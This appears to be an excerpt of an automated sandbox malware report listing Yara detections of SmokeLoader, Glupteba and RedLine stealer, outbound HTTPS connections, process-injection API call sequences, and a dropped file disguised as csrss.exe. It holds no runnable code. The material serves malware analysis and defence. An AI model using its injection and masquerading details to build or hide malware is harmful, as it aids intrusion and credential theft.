Source: 3EBB.exe, 00000007.00000003.2355444891.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2357874414.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2356349485.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2359461162.000001D435ADA000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2358545994.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2359461162.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2362618248.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2355663407.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2356967990.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2356491235.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2356234188.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2355558887.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2356967990.000001D435AD7000.00000004.00000020.00020000.00000000.sdmp, 3EBB.exe, 00000007.00000003.2355313569.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: 3EBB.exe, 00000007.00000003.2357874414.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.openssl.org/H

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 51.15.246.170:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.215.49:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.149:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.50.191.95:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.13.164.118:443 -> 192.168.2.5:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.160.114.209:443 -> 192.168.2.5:49758 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 38.3.sfriduf.a40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.5F46.exe.9e0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.fcriduf.8c0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.5F46.exe.9f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HVqTxn73uD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.sfriduf.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.fcriduf.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HVqTxn73uD.exe.900e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.3.fcriduf.8d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.HVqTxn73uD.exe.910000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.sfriduf.2490000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.sfriduf.9c0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.5F46.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.fcriduf.8d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1971295598.0000000000910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2032558481.0000000000A21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2275022299.0000000002490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2496448528.00000000009F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2224102941.0000000002490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2747452947.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.2695604056.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2440312745.00000000009F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2496691217.00000000024E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2275065995.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2748251512.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.4351039490.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.4351072817.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2032530919.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

E-Banking Fraud

Yara detected Glupteba

Source: Yara match	File source: 33.2.6F54.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.6F54.exe.2e70e67.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.3.6F54.exe.3760000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.6F54.exe.37a0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.6F54.exe.3840000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000021.00000002.2590161504.00000000032B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.2563945392.0000000003BA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2587451571.0000000000843000.00000040.00000001.01000000.0000001B.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2500426400.0000000003BE2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.2528540786.0000000003C82000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000004.00000002.2274952630.00000000009C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.2274907506.0000000000898000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2032488067.0000000000900000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2032558481.0000000000A21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.2032639439.0000000000AB9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.2275022299.0000000002490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000E.00000002.2496448528.00000000009F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000024.00000002.2747452947.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000021.00000002.2590161504.0000000002E70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000005.00000002.2332039620.000000000508F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000021.00000002.2589650325.0000000002A6E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000E.00000002.2496691217.00000000024E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000024.00000002.2747774480.0000000000929000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000E.00000002.2496586811.0000000000A58000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001A.00000002.2537616639.0000000005600000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.2275065995.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000024.00000002.2748251512.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000C.00000002.2443676408.0000000005600000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000E.00000002.2496417036.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2032530919.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000024.00000002.2747425610.00000000008C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Code function: 0_2_00401590 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,LocalAlloc,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401590
Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Code function: 0_2_004015CB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,LocalAlloc,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015CB
Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Code function: 0_2_00403383 LdrLoadDll,GetModuleHandleA,NtQueryKey,	0_2_00403383
Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Code function: 0_2_0040159B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,LocalAlloc,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040159B
Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Code function: 0_2_004015B0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,LocalAlloc,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015B0
Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Code function: 0_2_004015BC NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,LocalAlloc,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015BC
Source: C:\Users\user\AppData\Roaming\sfriduf	Code function: 4_2_00401590 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,LocalAlloc,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401590
Source: C:\Users\user\AppData\Roaming\sfriduf	Code function: 4_2_004015CB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,LocalAlloc,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004015CB
Source: C:\Users\user\AppData\Roaming\sfriduf	Code function: 4_2_0040159B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,LocalAlloc,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_0040159B
Source: C:\Users\user\AppData\Roaming\sfriduf	Code function: 4_2_004015B0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,LocalAlloc,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004015B0
Source: C:\Users\user\AppData\Roaming\sfriduf	Code function: 4_2_004015BC NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,LocalAlloc,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004015BC
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Code function: 5_2_05350110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	5_2_05350110
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_04521000 NtCreateThreadEx,	11_2_04521000
Source: C:\ProgramData\Drivers\csrss.exe	Code function: 12_2_05800110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	12_2_05800110
Source: C:\Users\user\AppData\Local\Temp\5F46.exe	Code function: 14_2_00401459 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	14_2_00401459
Source: C:\Users\user\AppData\Local\Temp\5F46.exe	Code function: 14_2_00401464 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	14_2_00401464
Source: C:\Users\user\AppData\Local\Temp\5F46.exe	Code function: 14_2_00401476 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	14_2_00401476
Source: C:\Users\user\AppData\Local\Temp\5F46.exe	Code function: 14_2_00403208 NtTerminateProcess,GetModuleHandleA,	14_2_00403208
Source: C:\Users\user\AppData\Local\Temp\5F46.exe	Code function: 14_2_0040320A NtTerminateProcess,GetModuleHandleA,	14_2_0040320A
Source: C:\Users\user\AppData\Local\Temp\5F46.exe	Code function: 14_2_00403233 NtTerminateProcess,GetModuleHandleA,NtEnumerateKey,	14_2_00403233
Source: C:\Users\user\AppData\Local\Temp\5F46.exe	Code function: 14_2_004031E8 NtTerminateProcess,GetModuleHandleA,	14_2_004031E8
Source: C:\Users\user\AppData\Local\Temp\5F46.exe	Code function: 14_2_004021E9 NtQuerySystemInformation,	14_2_004021E9
Source: C:\Users\user\AppData\Local\Temp\5F46.exe	Code function: 14_2_00401487 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	14_2_00401487
Source: C:\ProgramData\Drivers\csrss.exe	Code function: 26_2_05800110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	26_2_05800110

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File deleted: C:\Windows\Temp\__PSScriptPolicyTest_bfhoep5y.umn.ps1

Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Code function: 0_2_0040D025	0_2_0040D025
Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Code function: 0_2_0040CAE1	0_2_0040CAE1
Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Code function: 0_2_0040D569	0_2_0040D569
Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Code function: 0_2_0040E9C2	0_2_0040E9C2
Source: C:\Users\user\AppData\Roaming\sfriduf	Code function: 4_2_0040D025	4_2_0040D025
Source: C:\Users\user\AppData\Roaming\sfriduf	Code function: 4_2_0040CAE1	4_2_0040CAE1
Source: C:\Users\user\AppData\Roaming\sfriduf	Code function: 4_2_0040D569	4_2_0040D569
Source: C:\Users\user\AppData\Roaming\sfriduf	Code function: 4_2_0040E9C2	4_2_0040E9C2
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_00401000	8_2_00401000
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_00401230	8_2_00401230
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_00407988	8_2_00407988
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005B7050	8_2_005B7050
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005B8000	8_2_005B8000
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005DE8FD	8_2_005DE8FD
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005970E0	8_2_005970E0
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005B40B0	8_2_005B40B0
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005938A0	8_2_005938A0
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005B2960	8_2_005B2960
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_00586930	8_2_00586930
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005B2130	8_2_005B2130
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005849C0	8_2_005849C0
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005B61F0	8_2_005B61F0
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005CA980	8_2_005CA980
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005969A0	8_2_005969A0
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005CBA50	8_2_005CBA50
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_00592A40	8_2_00592A40
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005CCA40	8_2_005CCA40
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005D9A6B	8_2_005D9A6B
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005B8260	8_2_005B8260
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005CC260	8_2_005CC260
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005D02D0	8_2_005D02D0
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005B0AC0	8_2_005B0AC0
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005832A0	8_2_005832A0
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005873F0	8_2_005873F0
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005DAB93	8_2_005DAB93
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005EBC57	8_2_005EBC57
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005AF4F0	8_2_005AF4F0
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005CB4E0	8_2_005CB4E0
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005B3C90	8_2_005B3C90
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005B34A0	8_2_005B34A0
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_00593540	8_2_00593540
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005CFD60	8_2_005CFD60
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_00596D10	8_2_00596D10
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005EBD0F	8_2_005EBD0F
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005CCDF0	8_2_005CCDF0
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005D15F0	8_2_005D15F0
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005A0E50	8_2_005A0E50
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005CD650	8_2_005CD650
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_00585670	8_2_00585670
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005EEE0C	8_2_005EEE0C
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005CAE30	8_2_005CAE30
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005D1E80	8_2_005D1E80
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005E9F5E	8_2_005E9F5E
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005B5770	8_2_005B5770
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005D0700	8_2_005D0700
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005B97D0	8_2_005B97D0
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005B47C0	8_2_005B47C0
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005D4FC0	8_2_005D4FC0
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: 8_2_005DDF90	8_2_005DDF90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_027B547C	11_2_027B547C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_027B1ABC	11_2_027B1ABC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_027B103C	11_2_027B103C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_027B3534	11_2_027B3534
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_027B11E8	11_2_027B11E8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_027B3E24	11_2_027B3E24
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_027B1858	11_2_027B1858
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_027B39D8	11_2_027B39D8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_04521C40	11_2_04521C40
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_04521000	11_2_04521000
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_04521807	11_2_04521807
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_045294D0	11_2_045294D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_04521F90	11_2_04521F90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_04521AAD	11_2_04521AAD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_04522570	11_2_04522570
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_04523C60	11_2_04523C60
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_045227C0	11_2_045227C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_045212E0	11_2_045212E0
Source: C:\Users\user\AppData\Local\Temp\5F46.exe	Code function: 14_2_0040D569	14_2_0040D569
Source: C:\Users\user\AppData\Local\Temp\5F46.exe	Code function: 14_2_0040D025	14_2_0040D025
Source: C:\Users\user\AppData\Local\Temp\5F46.exe	Code function: 14_2_0040E9C2	14_2_0040E9C2
Source: C:\Users\user\AppData\Local\Temp\5F46.exe	Code function: 14_2_0040CAE1	14_2_0040CAE1
Source: C:\Users\user\AppData\Local\Temp\6F54.exe	Code function: 16_1_004058B5	16_1_004058B5
Source: C:\Users\user\AppData\Local\Temp\6F54.exe	Code function: 33_1_004058B5	33_1_004058B5

Source: Joe Sandbox View	Dropped File: C:\ProgramData\Drivers\csrss.exe F3C70EC32049139737226C85A87D453AC98C6A0FFC7747BA4F65118A1B8EF670
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\2788.exe F3C70EC32049139737226C85A87D453AC98C6A0FFC7747BA4F65118A1B8EF670

Source: C:\Users\user\AppData\Local\Temp\6F54.exe	Code function: String function: 00407690 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Code function: String function: 005D5F00 appears 35 times

Source: HVqTxn73uD.exe, 00000000.00000000.1968240463.000000000084C000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenameLariavts> vs HVqTxn73uD.exe

Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cdprt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Section loaded: csunsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Section loaded: swift.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Section loaded: nfhwcrhk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Section loaded: surewarehook.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Section loaded: csunsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Section loaded: aep.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Section loaded: atasi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Section loaded: swift.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Section loaded: nfhwcrhk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Section loaded: nuronssl.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Section loaded: surewarehook.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Section loaded: ubsec.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Section loaded: aep.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Section loaded: atasi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Section loaded: swift.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Section loaded: nfhwcrhk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Section loaded: nuronssl.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Section loaded: surewarehook.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Section loaded: ubsec.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: csunsapi.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: swift.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: nfhwcrhk.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: surewarehook.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: csunsapi.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: swift.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: nfhwcrhk.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: surewarehook.dll

